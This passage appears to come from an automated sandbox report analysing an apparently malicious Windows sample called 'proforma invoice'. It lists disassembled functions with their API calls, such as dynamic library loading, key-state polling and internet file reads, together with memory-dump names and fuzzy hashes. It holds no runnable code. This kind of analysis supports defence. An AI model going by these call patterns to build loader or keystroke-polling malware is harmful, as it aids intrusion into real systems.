                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$Clear$ChangeInitType
                  • String ID:
                  • API String ID: 4136290138-0
                  • Opcode ID: 69908abc108c5212fa916572fa4e31e4099b87d7e27c27dcc9aee91b183731cd
                  • Instruction ID: 7499b61f8dd7426a7b85e42c30e2c88f3b2880d60fd0bae0ac65b2b95656dcd2
                  • Opcode Fuzzy Hash: 69908abc108c5212fa916572fa4e31e4099b87d7e27c27dcc9aee91b183731cd
                  • Instruction Fuzzy Hash: DB517DB5A00219EFCB10CF58C894AAABBF5FF89310B158669F945DB350E730EA11CF90
                  Function 00B18AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                  Download Yara Rule
                  APIs
                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B18BAE
                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B18BDA
                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B18C32
                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B18C57
                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B18C5F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: PrivateProfile$SectionWrite$String
                  • String ID:
                  • API String ID: 2832842796-0
                  • Opcode ID: 059729a6211d323db69e8660ff0bbbd741c70d434f18ab661b4824f8f967f17f
                  • Instruction ID: f9dfa906f05f1664f6bc1e1639c1c4c9a2ea795053712e376bf1e94492a661a8
                  • Opcode Fuzzy Hash: 059729a6211d323db69e8660ff0bbbd741c70d434f18ab661b4824f8f967f17f
                  • Instruction Fuzzy Hash: CA513035A00215DFCB05DF64C981AAEBBF5FF49314F088498E8496B3A2DB35ED51CB90
                  Function 00B28EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00B28F40
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00B28FD0
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B28FEC
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00B29032
                  • FreeLibrary.KERNEL32(00000000), ref: 00B29052
                    • Part of subcall function 00ABF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B11043,?,753CE610), ref: 00ABF6E6
                    • Part of subcall function 00ABF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00AFFA64,00000000,00000000,?,?,00B11043,?,753CE610,?,00AFFA64), ref: 00ABF70D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                  • String ID:
                  • API String ID: 666041331-0
                  • Opcode ID: e71d1dca02844267b58940b30320eb7e8bb8d7a00a3f07039bec89bd00efa007
                  • Instruction ID: 9ccb41d1a1876f7889c25f5be5005a27cf19f81264294818b1b10c843ea078f0
                  • Opcode Fuzzy Hash: e71d1dca02844267b58940b30320eb7e8bb8d7a00a3f07039bec89bd00efa007
                  • Instruction Fuzzy Hash: 24515C35A01215DFC711DF58D5948AEBBF1FF49314F0884A9E80AAB362DB31ED86CB90
                  Function 00B36B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                  Download Yara Rule
                  APIs
                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00B36C33
                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00B36C4A
                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00B36C73
                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00B1AB79,00000000,00000000), ref: 00B36C98
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00B36CC7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Long$MessageSendShow
                  • String ID:
                  • API String ID: 3688381893-0
                  • Opcode ID: 91234cc0008848386cca3002039dc43bb952b57b3832f0968bf2e6072b8bef71
                  • Instruction ID: 5f47505625142504154640b57b74b5815ffeb507a9cf18e4519efc24fcfc9a07
                  • Opcode Fuzzy Hash: 91234cc0008848386cca3002039dc43bb952b57b3832f0968bf2e6072b8bef71
                  • Instruction Fuzzy Hash: AB41E635A04104BFDB24CF68CC95FA9BFE4EB09350F6592A8F899A72E0D771ED41CA50
                  Function 00AD2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: e7eb7cee21afe6a5b153a8f44983ad240ff86d0b1ee0ebbba56a3b6e4ff1234d
                  • Instruction ID: 49c7f63668ff0a9b79fc3c472bd6293254cec7b52614e969864587b2a4d4ff96
                  • Opcode Fuzzy Hash: e7eb7cee21afe6a5b153a8f44983ad240ff86d0b1ee0ebbba56a3b6e4ff1234d
                  • Instruction Fuzzy Hash: C841B632A00200AFCB24DF78C981B6DB7B5EF99714F154569E516EB391DA31ED01DB80
                  Function 00AB912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • GetCursorPos.USER32(?), ref: 00AB9141
                  • ScreenToClient.USER32(00000000,?), ref: 00AB915E
                  • GetAsyncKeyState.USER32(00000001), ref: 00AB9183
                  • GetAsyncKeyState.USER32(00000002), ref: 00AB919D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AsyncState$ClientCursorScreen
                  • String ID:
                  • API String ID: 4210589936-0
                  • Opcode ID: 75ea90d57ef912d3375f15e8942624de2bd4c2561916256da24b674a4c0a88a0
                  • Instruction ID: bf075eb6c8dfd10ba95b2dfc7142a85dbfadb349be22ab327db1b703fbf6b8dc
                  • Opcode Fuzzy Hash: 75ea90d57ef912d3375f15e8942624de2bd4c2561916256da24b674a4c0a88a0
                  • Instruction Fuzzy Hash: CF414D7190850AAADB159FA8D844BFEBB74FF05320F208319F529A72A1CB345954DB51
                  Function 00B13874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetInputState.USER32 ref: 00B138CB
                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B13922
                  • TranslateMessage.USER32(?), ref: 00B1394B
                  • DispatchMessageW.USER32(?), ref: 00B13955
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B13966
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                  • String ID:
                  • API String ID: 2256411358-0
                  • Opcode ID: 0ba67dfead616cc1ba57ad6c3c10766081e46ab41bfc1063908a74cdeb08f994
                  • Instruction ID: a4e830e2d66bb921c0c3c9e743f437661dd5aa28255e1270a2b4c696b1523622
                  • Opcode Fuzzy Hash: 0ba67dfead616cc1ba57ad6c3c10766081e46ab41bfc1063908a74cdeb08f994
                  • Instruction Fuzzy Hash: 7C31C6705043419EEB35CB789849BF63BE8EB15740F9405E9E467D30A0FBB4AAC5CB21
                  Function 00B1CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                  Download Yara Rule
                  APIs
                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00B1CF38
                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00B1CF6F
                  • GetLastError.KERNEL32(?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFB4
                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFC8
                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFF2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                  • String ID:
                  • API String ID: 3191363074-0
                  • Opcode ID: 804e617178e6e086c23978890a61422a2b2d48a9ee2b7e40d302acedaa5c2142
                  • Instruction ID: 3a0266afb8d6b4a475814b10db4024c238a539b77040dc654d43021df03cb63b
                  • Opcode Fuzzy Hash: 804e617178e6e086c23978890a61422a2b2d48a9ee2b7e40d302acedaa5c2142
                  • Instruction Fuzzy Hash: 1B313A71540205AFDB20DFA5C984AABBFF9EB14354B6044AEF516E3141DB30EE8A9B60
                  Function 00B01901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                  Download Yara Rule
                  APIs
                  • GetWindowRect.USER32(?,?), ref: 00B01915
                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 00B019C1
                  • Sleep.KERNEL32(00000000,?,?,?), ref: 00B019C9
                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 00B019DA
                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B019E2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessagePostSleep$RectWindow
                  • String ID:
                  • API String ID: 3382505437-0
                  • Opcode ID: 847de4d0c25f22cd1b65ecb871533157b62ed02526744cecf1a8f9bf6b32201a
                  • Instruction ID: 1fe31bbc1d37416820057684b7057e08fa8c3857661e5e71080e06d76c3129c3
                  • Opcode Fuzzy Hash: 847de4d0c25f22cd1b65ecb871533157b62ed02526744cecf1a8f9bf6b32201a
                  • Instruction Fuzzy Hash: 2231C071A00219EFCB04CFACCD99ADE3FB5EB45315F108669FA21A72D1C7709945DB90
                  Function 00B35706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B35745
                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B3579D
                  • _wcslen.LIBCMT ref: 00B357AF
                  • _wcslen.LIBCMT ref: 00B357BA
                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B35816
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$_wcslen
                  • String ID:
                  • API String ID: 763830540-0
                  • Opcode ID: 4710f3a895467bb966cf1ddeb9389c26deb780db20c2c186fd2ee5ed3ef70ae9
                  • Instruction ID: 66875b469e4780e3f7782e4d46ac7cd28a65b5b9b632d92b3cc860349ffdd4eb
                  • Opcode Fuzzy Hash: 4710f3a895467bb966cf1ddeb9389c26deb780db20c2c186fd2ee5ed3ef70ae9
                  • Instruction Fuzzy Hash: 55216575904618DADB309FA4DC85AED7BF8FF04724F208296E929EB2C4D7709985CF50
                  Function 00B20930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                  Download Yara Rule
                  APIs
                  • IsWindow.USER32(00000000), ref: 00B20951
                  • GetForegroundWindow.USER32 ref: 00B20968
                  • GetDC.USER32(00000000), ref: 00B209A4
                  • GetPixel.GDI32(00000000,?,00000003), ref: 00B209B0
                  • ReleaseDC.USER32(00000000,00000003), ref: 00B209E8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ForegroundPixelRelease
                  • String ID:
                  • API String ID: 4156661090-0
                  • Opcode ID: 5b7ffe03b2465619dbfa738b03c369bab33f021ac9da27bb25ca67a49ea7e7d8
                  • Instruction ID: fbefa2ab662b00351e0263bc8ff62bfbd95d5dc4f83b5c1dbd2a4ca8c5ed6c4a
                  • Opcode Fuzzy Hash: 5b7ffe03b2465619dbfa738b03c369bab33f021ac9da27bb25ca67a49ea7e7d8
                  • Instruction Fuzzy Hash: 0B219635600214AFD704EFA9D985A9EBBF5EF49700F148468F84AE7762CB30EC44CB50
                  Function 00ADCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 00ADCDC6
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ADCDE9
                    • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00ADCE0F
                  • _free.LIBCMT ref: 00ADCE22
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ADCE31
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: eb50f625e7fc53623fcbb6f430161bb3c5d599feee09d55b4c22a02621933ad4
                  • Instruction ID: 780b3add48663028d4156d4b469affb18eed32ff39e2b15d8dcd8afcdcb705c9
                  • Opcode Fuzzy Hash: eb50f625e7fc53623fcbb6f430161bb3c5d599feee09d55b4c22a02621933ad4
                  • Instruction Fuzzy Hash: B10175B26016167F672117BA6C48D7FBE6DEEC6BB1365012AF906D7301EE618D01D2B0
                  Function 00AB9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                  Download Yara Rule
                  APIs
                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
                  • SelectObject.GDI32(?,00000000), ref: 00AB96A2
                  • BeginPath.GDI32(?), ref: 00AB96B9
                  • SelectObject.GDI32(?,00000000), ref: 00AB96E2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ObjectSelect$BeginCreatePath
                  • String ID:
                  • API String ID: 3225163088-0
                  • Opcode ID: 4e94147e625b4881742c937bc6f1e5ab280f5de0b8f709f0d68e1d4f61b2d56a
                  • Instruction ID: b2708fd143ff2b435a4286620f2ab2284bb2e88d75b7a971d7cf876d4e1a6b3b
                  • Opcode Fuzzy Hash: 4e94147e625b4881742c937bc6f1e5ab280f5de0b8f709f0d68e1d4f61b2d56a
                  • Instruction Fuzzy Hash: E3217F31802305EBDB119F6CDC29BEE7BB8BB10315F100616F619A71B2DB705893CBA0
                  Function 00AB990E Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                  Download Yara Rule
                  APIs
                  • GetSysColor.USER32(00000008), ref: 00AB98CC
                  • SetTextColor.GDI32(?,?), ref: 00AB98D6
                  • SetBkMode.GDI32(?,00000001), ref: 00AB98E9
                  • GetStockObject.GDI32(00000005), ref: 00AB98F1
                  • GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Color$LongModeObjectStockTextWindow
                  • String ID:
                  • API String ID: 1860813098-0
                  • Opcode ID: 4308b22a024f02154323d69ca5f3e05c640e3debfa5969d1b5655c41c23cab7f
                  • Instruction ID: c0caf4516d51bef4544a0e8878768d0a789a328dcefab351536017d8a3383a18
                  • Opcode Fuzzy Hash: 4308b22a024f02154323d69ca5f3e05c640e3debfa5969d1b5655c41c23cab7f
                  • Instruction Fuzzy Hash: E111C832146250AFCB128FA5EC5AEEF3F78EB127117140559F642AB5B3CB254991CB50
                  Function 00B05711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: f0fbc94c84a3734daa93cd540428509f4e84a93067815a17c7e37d5c86f415fd
                  • Instruction ID: 87bae541a8ebc7637d4a5f31b36627881209ab9ec1b12b4a5a6d738730a52d2d
                  • Opcode Fuzzy Hash: f0fbc94c84a3734daa93cd540428509f4e84a93067815a17c7e37d5c86f415fd
                  • Instruction Fuzzy Hash: 0701B9B5781605BBD72855109F82FBB77DCEF21398F504064FD049EAC2F760ED1096A1
                  Function 00AD2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,?,00ACF2DE,00AD3863,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6), ref: 00AD2DFD
                  • _free.LIBCMT ref: 00AD2E32
                  • _free.LIBCMT ref: 00AD2E59
                  • SetLastError.KERNEL32(00000000,00AA1129), ref: 00AD2E66
                  • SetLastError.KERNEL32(00000000,00AA1129), ref: 00AD2E6F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: 36a6535faa40116864035dfc5eb8ee8f891eaea7f181f35d5d8ece0cfbf341a6
                  • Instruction ID: 4a873a25afaffa9ac63104b05ff901ae621a273e1840b2b9573aeaca78779587
                  • Opcode Fuzzy Hash: 36a6535faa40116864035dfc5eb8ee8f891eaea7f181f35d5d8ece0cfbf341a6
                  • Instruction Fuzzy Hash: 0C01D1366056006B872227756D45F2B3F69ABF13A2B34442BF837A33D2EEB48801C320
                  Function 00B0000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                  Download Yara Rule
                  APIs
                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?,?,00B0035E), ref: 00B0002B
                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00046
